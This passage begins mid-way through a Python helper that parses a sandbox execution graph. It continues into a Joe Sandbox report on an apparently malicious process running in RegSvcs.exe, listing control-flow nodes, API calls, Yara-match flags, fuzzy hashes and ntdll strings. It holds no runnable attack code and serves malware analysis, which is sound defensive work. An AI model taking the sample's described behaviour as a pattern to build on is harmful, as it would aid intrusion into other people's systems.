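    nodes, edges = {}, []
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                      # edge: '<id>-><id>'
            src, dst = tok.split("->", 1)
            edges.append((src, dst))
            i += 1
            continue
        if i + 1 >= len(tokens):
            raise ValueError(f"node {tok} has no address")
        node_id, addr = tok, int(tokens[i + 1], 16)   # node: '<id> <addr>'
        i += 2
        apis = []
        while i < len(tokens) and "->" not in tokens[i] and not tokens[i].isdigit():
            apis.append(tokens[i])           # API names attached to this node
            i += 1
        nodes[node_id] = (addr, apis)
    return nodes, edges


def roots(nodes, edges):
    """Node ids with no incoming edge: the entry points the plugin graphed."""
    targets = {dst for _, dst in edges}
    return sorted(n for n in nodes if n not in targets)


def dump_for(addr, bases=DUMP_BASES):
    """Highest dump base at or below addr (None if addr is below every base)."""
    candidates = [b for b in bases if b <= addr]
    return max(candidates) if candidates else None


def reachable_apis(nodes, edges, root, bases=DUMP_BASES):
    """BFS from root; map each reached dump base to the sorted APIs called there."""
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    seen, queue, out = {root}, deque([root]), {}
    while queue:
        cur = queue.popleft()
        if cur in nodes:                     # edges may name undeclared nodes
            addr, apis = nodes[cur]
            if apis:
                out.setdefault(dump_for(addr, bases), set()).update(apis)
        for nxt in succ.get(cur, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return {base: sorted(apis) for base, apis in out.items()}


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(GRAPH_EXCERPT)
    for r in roots(nodes, edges):
        print(f"entry {nodes[r][0]:#x}:")
        for base, apis in sorted(reachable_apis(nodes, edges, r).items()):
            print(f"  dump {base:#x}: {', '.join(apis)}")
```

Run against the excerpt, the single entry point 0x41a603 reaches RtlAllocateHeap and RtlFreeHeap through stubs inside the 0x400000 image and LdrInitializeThunk inside the 0x1560000 dump. Feeding the full execution_graph line in (it is one string; the three lines above are an extraction break, not a format boundary) gives the same per-entry, per-dump breakdown for every root the plugin graphed.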

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 371 417853-41787c call 42f473 374 417882-417890 call 42fa73 371->374 375 41787e-417881 371->375 378 4178a0-4178b1 call 42df13 374->378 379 417892-41789d call 42fd13 374->379 384 4178b3-4178c7 LdrLoadDll 378->384 385 4178ca-4178cd 378->385 379->378 384->385
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178C5
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 76b506a0cc5b578974a65303308517cdf43573eca2b8ac17c4e7b5baa97a7e0c
                                                              • Instruction ID: 1cb38ccdf7d651f1bb70c04efbc39f1e1caf3780722470d7d920a02544f09f31
                                                              • Opcode Fuzzy Hash: 76b506a0cc5b578974a65303308517cdf43573eca2b8ac17c4e7b5baa97a7e0c
                                                              • Instruction Fuzzy Hash: 110152B1E4020DB7DF10EAE1DC42FDEB7789B14308F4041A6E90897240F634EB48C795

                                                              Control-flow Graph

                                                              control_flow_graph 396 42c7c3-42c7fc call 404653 call 42da03 NtClose
                                                              APIs
                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C7F7
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 4b864a366b5b27e43805e6b99a6c495b5a065df10857e84a8a109e2f0984c103
                                                              • Instruction ID: 655702566d971be8828d1eb074539a96951f6316c6bda2febc2cf9207e520fe9
                                                              • Opcode Fuzzy Hash: 4b864a366b5b27e43805e6b99a6c495b5a065df10857e84a8a109e2f0984c103
                                                              • Instruction Fuzzy Hash: B3E046362042547BC220BA5AEC41FDB776DEBC5754F00441AFA08A7241D6B6BA158BE8

                                                              Control-flow Graph

                                                              control_flow_graph 410 15d2b60-15d2b6c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6c9103fabb4391724a00c641fa909b1130fd69d6f926c90f84624d33a38f5f73
                                                              • Instruction ID: 7c122859cda5735cfa88d52c7e3190221f5b65acb0d2046d145294b44a1b9722
                                                              • Opcode Fuzzy Hash: 6c9103fabb4391724a00c641fa909b1130fd69d6f926c90f84624d33a38f5f73
                                                              • Instruction Fuzzy Hash: DF90026160240003410972584418616408AA7E0211B59C421E1014990DC56589916225
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 220d5999afe8c2ff18fcbec11b728cf811283856e94346799e0008f8f8c898f4
                                                              • Instruction ID: 77ac7b294673f5818fa2640514454856cf971841be5eca3eeeee6d53ff32a42e
                                                              • Opcode Fuzzy Hash: 220d5999afe8c2ff18fcbec11b728cf811283856e94346799e0008f8f8c898f4
                                                              • Instruction Fuzzy Hash: 2990023160140413D115725845087070089A7D0251F99C812A0424958DD6968A52A221
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 64284f91fc8fdcf540f350768119264298cedf07dd77707d9663ceb2cea0c902
                                                              • Instruction ID: 3e29ed3d29b0892d6e8d646bbcd5991538b16a9bd0b63507ac230cab250efbfd
                                                              • Opcode Fuzzy Hash: 64284f91fc8fdcf540f350768119264298cedf07dd77707d9663ceb2cea0c902
                                                              • Instruction Fuzzy Hash: B190023160148802D1147258840874A0085A7D0311F5DC811A4424A58DC6D589917221
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 00c02998ad449e1fb0cdfaf22ac89aabc67d5067995c22b333551498058e2c6e
                                                              • Instruction ID: 4adf2cd3ea3bdca79dca36a60b1f974098add921ac85357bd232ca71505b5a38
                                                              • Opcode Fuzzy Hash: 00c02998ad449e1fb0cdfaf22ac89aabc67d5067995c22b333551498058e2c6e
                                                              • Instruction Fuzzy Hash: 5D900231A0550402D104725845187061085A7D0211F69C811A0424968DC7D58A5166A2

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: H846yjBj$H846yjBj
                                                              • API String ID: 1836367815-1638195495
                                                              • Opcode ID: ef7a9ffdf6561eef383bbc0664de7790ce42323556bf1a7fe240d511c29f7c54
                                                              • Instruction ID: 3c683207899974e191189142c536af44746b7e051b83f101aac545a713f4ebdb
                                                              • Opcode Fuzzy Hash: ef7a9ffdf6561eef383bbc0664de7790ce42323556bf1a7fe240d511c29f7c54
                                                              • Instruction Fuzzy Hash: D7018C71A0524C7FE7129EA0AC82CEFFBACDE82754B0481DEF61097251C6355E428791

                                                              Control-flow Graph

                                                              control_flow_graph 10 414086-4140d0 call 42e933 call 42f343 call 417853 18 4140d7-4140fd call 424f43 10->18 19 4140d2 call 4045c3 10->19 22 41411d-414123 18->22 23 4140ff-41410e PostThreadMessageW 18->23 19->18 23->22 24 414110-41411a 23->24 24->22
                                                              APIs
                                                              • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: H846yjBj$H846yjBj
                                                              • API String ID: 1836367815-1638195495
                                                              • Opcode ID: 1e575f985c92c78392c5d7947edd5ded7c5b5c375e9d7c50ded5dd71fbab49a2
                                                              • Instruction ID: 7b3e0f07fc7c6ddc1f756203e9316b04f6aa799e2925db75b152c8468b4ea2e0
                                                              • Opcode Fuzzy Hash: 1e575f985c92c78392c5d7947edd5ded7c5b5c375e9d7c50ded5dd71fbab49a2
                                                              • Instruction Fuzzy Hash: 9F114CB1E0011C7EDB01EBE19C82DEFBB7CDF81798F40806AFA04A7141D6785E068BA1

                                                              Control-flow Graph

                                                              control_flow_graph 25 414093-4140d0 call 42e933 call 42f343 call 417853 33 4140d7-4140fd call 424f43 25->33 34 4140d2 call 4045c3 25->34 37 41411d-414123 33->37 38 4140ff-41410e PostThreadMessageW 33->38 34->33 38->37 39 414110-41411a 38->39 39->37
                                                              APIs
                                                              • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: H846yjBj$H846yjBj
                                                              • API String ID: 1836367815-1638195495
                                                              • Opcode ID: 984f09a5dd09cd233dbe0f3a3a71350ed3a96ed15f6ad2f6789276278f6a4a35
                                                              • Instruction ID: 01bac9bffc664040b2840fdb37e185e6924918b58f593d4067fc296cad9bf454
                                                              • Opcode Fuzzy Hash: 984f09a5dd09cd233dbe0f3a3a71350ed3a96ed15f6ad2f6789276278f6a4a35
                                                              • Instruction Fuzzy Hash: 5B01D6B1D0011C7AEB11ABE19C82DEFBB7CDF81798F40806AFA14B7141D6785E464BB5

                                                              Control-flow Graph

                                                              control_flow_graph 40 414124 call 42e933 call 42f343 call 417853 48 4140d7-4140fd call 424f43 40->48 49 4140d2 call 4045c3 40->49 52 41411d-414123 48->52 53 4140ff-41410e PostThreadMessageW 48->53 49->48 53->52 54 414110-41411a 53->54 54->52
                                                              APIs
                                                              • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: H846yjBj$H846yjBj
                                                              • API String ID: 1836367815-1638195495
                                                              • Opcode ID: d81ff8332ae71bd7ece2f7822f94f5d0f07d4ea2383a445a210605cec379552c
                                                              • Instruction ID: a53e75af234e0e2e8dc2ff362a0ab489f932a6b22d02496a9ffdf3fd85ddbe1d
                                                              • Opcode Fuzzy Hash: d81ff8332ae71bd7ece2f7822f94f5d0f07d4ea2383a445a210605cec379552c
                                                              • Instruction Fuzzy Hash: 1101F2B2D0011C7ADB11AAE19C82DEFBB7CDF81798F41806AFA04B7101D63C4E464BA5

                                                              Control-flow Graph

                                                              control_flow_graph 386 42cae3-42cb27 call 404653 call 42da03 RtlAllocateHeap
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,0041E634,?,?,00000000,?,0041E634,?,?,?), ref: 0042CB22
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: ab17b47021c6a0295688baa9bc7f5b74f4096b25377d82b86614dd7a19cdddd4
                                                              • Instruction ID: 02f8b4c6de11923e5652d0b1f4fbb4dcd003679feaa33a1029ac6aba649ea141
                                                              • Opcode Fuzzy Hash: ab17b47021c6a0295688baa9bc7f5b74f4096b25377d82b86614dd7a19cdddd4
                                                              • Instruction Fuzzy Hash: BDE09271604254BBC610EE99DC42FDB73ADEFC9714F004419FE08A7281D771B92187B8

                                                              Control-flow Graph

                                                              control_flow_graph 391 42cb33-42cb74 call 404653 call 42da03 RtlFreeHeap
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5B5E5FE1,00000007,00000000,00000004,00000000,004170BD,000000F4), ref: 0042CB6F
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: 74b9442f213fd3182763185ae7e99eac7d520918a63298e6a42031909f51ab9e
                                                              • Instruction ID: 88be9b9c6e7c59d6deab935c3c2594d1acbce9d117d58b86ffaeade349e087e0
                                                              • Opcode Fuzzy Hash: 74b9442f213fd3182763185ae7e99eac7d520918a63298e6a42031909f51ab9e
                                                              • Instruction Fuzzy Hash: 58E06D712043047BE610EE99EC41FDB33ADEFC5710F004419FA18A7282DA75B9108AB8

                                                              Control-flow Graph

                                                              control_flow_graph 401 42cb83-42cbbc call 404653 call 42da03 ExitProcess
                                                              APIs
                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,20989162,?,?,20989162), ref: 0042CBB7
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: bc082ca53517514892f10464e003e6611e059de3d739efd828c9c0662ba77a05
                                                              • Instruction ID: 4425423616075f17903b9c30fbfbf6d552649cbcaebd69dcc1db9d7e0672c02a
                                                              • Opcode Fuzzy Hash: bc082ca53517514892f10464e003e6611e059de3d739efd828c9c0662ba77a05
                                                              • Instruction Fuzzy Hash: 9CE086356042157BD210FA5ADC01FAF775CDFC5755F00842AFA08A7282D775790087F4

                                                              Control-flow Graph

                                                              control_flow_graph 406 15d2c0a-15d2c0f 407 15d2c1f-15d2c26 LdrInitializeThunk 406->407 408 15d2c11-15d2c18 406->408
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 1949cef9742fc98c6a8476f2eb4c5e89e3a55229c98486c4f0ad34eba3bdb5e8
                                                              • Instruction ID: dd5498e994d33f10a70b297bf6bc3704806a627ca2b025b84a5387940168edff
                                                              • Opcode Fuzzy Hash: 1949cef9742fc98c6a8476f2eb4c5e89e3a55229c98486c4f0ad34eba3bdb5e8
                                                              • Instruction Fuzzy Hash: 0EB09B71D025C5D5DA16E764460C71B794077D0711F19C461D2030A42F4778C5D1E375
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              • Opcode ID: 753cf0473531ffbebf807b5f258825d112e43e3b1894a6fa2dab422dd1fe2bca
                                                              • Instruction ID: 06b2a617b03c5080b7b7583baf575935f9110f62788112b56b5754a1c5cf9f25
                                                              • Opcode Fuzzy Hash: 753cf0473531ffbebf807b5f258825d112e43e3b1894a6fa2dab422dd1fe2bca
                                                              • Instruction Fuzzy Hash: 10929A71604342AFE721CE28CC90B6BB7E9BB84714F28492DFA95DB354D770E844CB92
                                                              Strings
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016054CE
                                                              • undeleted critical section in freed memory, xrefs: 0160542B
                                                              • 8, xrefs: 016052E3
                                                              • corrupted critical section, xrefs: 016054C2
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0160540A, 01605496, 01605519
                                                              • Thread identifier, xrefs: 0160553A
                                                              • Invalid debug info address of this critical section, xrefs: 016054B6
                                                              • Critical section debug info address, xrefs: 0160541F, 0160552E
                                                              • Address of the debug info found in the active list., xrefs: 016054AE, 016054FA
                                                              • double initialized or corrupted critical section, xrefs: 01605508
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016054E2
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01605543
                                                              • Critical section address, xrefs: 01605425, 016054BC, 01605534
                                                              • Critical section address., xrefs: 01605502
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              • API String ID: 0-2368682639
                                                              • Opcode ID: 3b70742a387fda5c4bbd6a03b38d6d0336959543e73da586f49a154c12b9a070
                                                              • Instruction ID: 75fe547f71fddd1670b9ba8b3e9d4e6b13011bda2b096ad9f998424988c7758b
                                                              • Opcode Fuzzy Hash: 3b70742a387fda5c4bbd6a03b38d6d0336959543e73da586f49a154c12b9a070
                                                              • Instruction Fuzzy Hash: 02817AB1A41349AFEB25CF99CC45BAEBBB5FB48B14F104119E505BB280D3B1A941CBA0
                                                              Strings
                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01602506
                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016024C0
                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016025EB
                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01602409
                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01602624
                                                              • @, xrefs: 0160259B
                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016022E4
                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01602498
                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0160261F
                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01602412
                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01602602
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                              • API String ID: 0-4009184096
                                                              • Opcode ID: 1b653e6362ea8df0b8668b534cf8f50968fe2b4b0fe7d3294d6cc8fb0e9b2b4a
                                                              • Instruction ID: 3176527dc945a18ccef7d677beeacc02393115b914cb7bf5f62102f57b02aab3
                                                              • Opcode Fuzzy Hash: 1b653e6362ea8df0b8668b534cf8f50968fe2b4b0fe7d3294d6cc8fb0e9b2b4a
                                                              • Instruction Fuzzy Hash: DB025EB1D002299FDB25DF54CC94BDAB7B8BF54704F0441EEA609AB281EB709E84CF59
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                              • API String ID: 0-2515994595
                                                              • Opcode ID: 051d0a5bfa22310cde095405b79f5a7b1fd9be0fe005d23fdda80f0b0717538c
                                                              • Instruction ID: c4d36d7c45579d865188b1984fcbfec690d3b9ce9e715fc415b40681771995d4
                                                              • Opcode Fuzzy Hash: 051d0a5bfa22310cde095405b79f5a7b1fd9be0fe005d23fdda80f0b0717538c
                                                              • Instruction Fuzzy Hash: D3519B725143029BD329CF288C48BABBBECFFD8654F144A1DB99987241E770DA05CBD2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              • Opcode ID: 2858f580c102991b266aff57c73279242d6be801eb10ec390c75c9ba6ca1f4eb
                                                              • Instruction ID: 51857c86373650716a5f2e9ce594073e2f0d8e756a59441848fc7a6e06378613
                                                              • Opcode Fuzzy Hash: 2858f580c102991b266aff57c73279242d6be801eb10ec390c75c9ba6ca1f4eb
                                                              • Instruction Fuzzy Hash: FED1CE316006A6EFDB26EF68C840AEDBBF6FF49610F088149F646AB752C734D941CB54
                                                              Strings
                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01618A67
                                                              • AVRF: -*- final list of providers -*- , xrefs: 01618B8F
                                                              • VerifierFlags, xrefs: 01618C50
                                                              • VerifierDlls, xrefs: 01618CBD
                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01618A3D
                                                              • VerifierDebug, xrefs: 01618CA5
                                                              • HandleTraces, xrefs: 01618C8F
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                              • API String ID: 0-3223716464
                                                              • Opcode ID: 284fdea9e0a23e4e394eb215a8aa40acfc5bdcf057511ae3d29375025a0b2d46
                                                              • Instruction ID: e9dccd21a847dc7a377d57cd14286cbec616c7189ea0cb285213ae8d03255a22
                                                              • Opcode Fuzzy Hash: 284fdea9e0a23e4e394eb215a8aa40acfc5bdcf057511ae3d29375025a0b2d46
                                                              • Instruction Fuzzy Hash: D8912672A41702AFD721EF68CC90B6A7BA9FB94B14F48465CFA42AF258C7709C01C795
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                              • API String ID: 0-1109411897
                                                              • Opcode ID: b6c04525dc527ddacb9bd6850d4a4b6f56e0c1760f2a4fb01d2edc78f611a4ca
                                                              • Instruction ID: fe22e31b174e97f1e31f88c4ab10505159ae4bcaa453011ec58da2c3cc7beceb
                                                              • Opcode Fuzzy Hash: b6c04525dc527ddacb9bd6850d4a4b6f56e0c1760f2a4fb01d2edc78f611a4ca
                                                              • Instruction Fuzzy Hash: F1A22874A0562A8FDF64DF18CD887AEBBB5BF45304F1442EAD909AB250DB309E81CF51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              • Opcode ID: f245f494a02bca524fe77893276ac52501f76e8bb1a83fc3b95ccd5db6190aeb
                                                              • Instruction ID: 8d7b75a5455382d253eeee169b85ae14ca31f506f6abc449003d19a3ccca0948
                                                              • Opcode Fuzzy Hash: f245f494a02bca524fe77893276ac52501f76e8bb1a83fc3b95ccd5db6190aeb
                                                              • Instruction Fuzzy Hash: AB910470B00316AFDB3AAF98DC85BAEBBA1BB50B14F14425CDA016F3C1DBB09901C795
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015E9A11, 015E9A3A
                                                              • apphelp.dll, xrefs: 01586496
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 015E9A01
